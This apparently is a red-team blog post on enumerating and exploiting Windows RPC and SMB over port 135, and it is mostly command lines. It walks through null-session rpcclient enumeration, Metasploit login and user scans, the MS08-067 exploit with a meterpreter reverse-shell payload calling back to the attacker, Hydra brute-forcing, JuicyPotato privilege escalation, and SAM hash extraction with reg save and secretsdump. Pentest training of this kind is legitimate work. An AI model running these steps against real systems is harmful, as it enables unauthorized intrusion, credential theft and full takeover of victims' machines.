Index / Blog / RPC Client Enumeration - Port 135
Thursday, March 13, 2025 • SECURITY RESEARCH ADVISORY

RPC Client Enumeration - Port 135

Pivoting for Red Teamers

Using rpcclient via Metasploit for Enumeration & Exploitation

rpcclient is a powerful tool used for enumerating and interacting with Windows RPC services. It is commonly used in penetration testing to extract usernames, groups, and policies from Windows machines.

Using rpcclient Manually (Without Metasploit)

If you already have valid credentials (or null session access), you can use rpcclient from Kali Linux:

rpcclient -U "" <TARGET_IP>

or

rpcclient -U "guest" <TARGET_IP>

🔹 If it prompts for a password, just press Enter to attempt a null session login.

Common Enumeration Commands


enumdomusers   # Enumerate domain users
queryuser <RID>  # Get user details (Replace <RID> with a user RID)
enumdomgroups  # Enumerate groups
querygroup <RID>  # Get group details
getsid  # Get security identifier (SID)
lookupnames <USERNAME>  # Get RID of a user

Using Metasploit’s rpcclient Modules

Step 1: Start Metasploit

msfconsole

Step 2: Use the SMB Login Module


use auxiliary/scanner/smb/smb_login
set RHOSTS <TARGET_IP>
set USERNAME <USER>
set PASSWORD <PASS>
run

✔ If it succeeds, you can use rpcclient with the valid credentials.

Step 3: Use auxiliary/scanner/smb/smb_enumusers


use auxiliary/scanner/smb/smb_enumusers
set RHOSTS <TARGET_IP>
set SMBDomain WORKGROUP
run

✔ This retrieves a list of valid Windows usernames via SMB.

Exploiting RPC Vulnerabilities

If RPC services are misconfigured or exploitable, you can try:

🔹 MS08-067 (EternalBlue Predecessor)


use exploit/windows/smb/ms08_067_netapi
set RHOST <TARGET_IP>
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST <YOUR_IP>
run

✔ This exploits an old SMB vulnerability, useful for legacy systems.

🔹 Other SMB/RPC Exploits

search rpc
search smb

Pro Tips for Effective Enumeration

  • Try null sessions (-U "") – Some systems allow unauthenticated access.
  • Use smbclient – To check for SMB shares:
smbclient -L //<TARGET_IP> -N
  • Brute-force with Hydra if needed:
hydra -L users.txt -P passwords.txt smb://<TARGET_IP>
  • Combine rpcclient + smbclient to extract more data before exploitation.

RPC Client Exploitation and Privilege Escalation

Understanding `enumprivs` in RPCClient

When you run the following command in rpcclient, it lists the privileges of the user:

rpcclient -U "USERNAME" "TARGET_IP"
enumprivs

If it returns 35 privileges, it indicates that the user has extensive permissions, some of which can be exploited for privilege escalation.

High-Risk Privileges (Privilege Escalation)

Privilege Name Description and Attack Scenario
SeImpersonatePrivilege Allows token impersonation; can be exploited using JuicyPotato/RoguePotato.
SeAssignPrimaryTokenPrivilege Allows assigning tokens to processes; useful for privilege escalation.
SeBackupPrivilege Allows reading all files, including sensitive registry hives (SAM and SYSTEM).

Exploiting Dangerous Privileges

If you find SeImpersonatePrivilege, you can try JuicyPotato for SYSTEM access:

msfconsole
use exploit/windows/local/juicypotato
set SESSION "SESSION_ID"
run

Extracting SAM Hashes (If `SeBackupPrivilege` is Present)

reg save HKLM\SAM sam.save
reg save HKLM\SYSTEM system.save

Then use `secretsdump.py`:

python3 secretsdump.py -sam sam.save -system system.save LOCAL

🔗 Conclusion

By analyzing the privileges returned by rpcclient, attackers can exploit misconfigurations and escalate privileges to SYSTEM using tools like JuicyPotato or by extracting registry hives.

Get In Touch

Open for technical advisories and offensive security engineering opportunities.

DIRECT EMAIL contact@nulljournal.info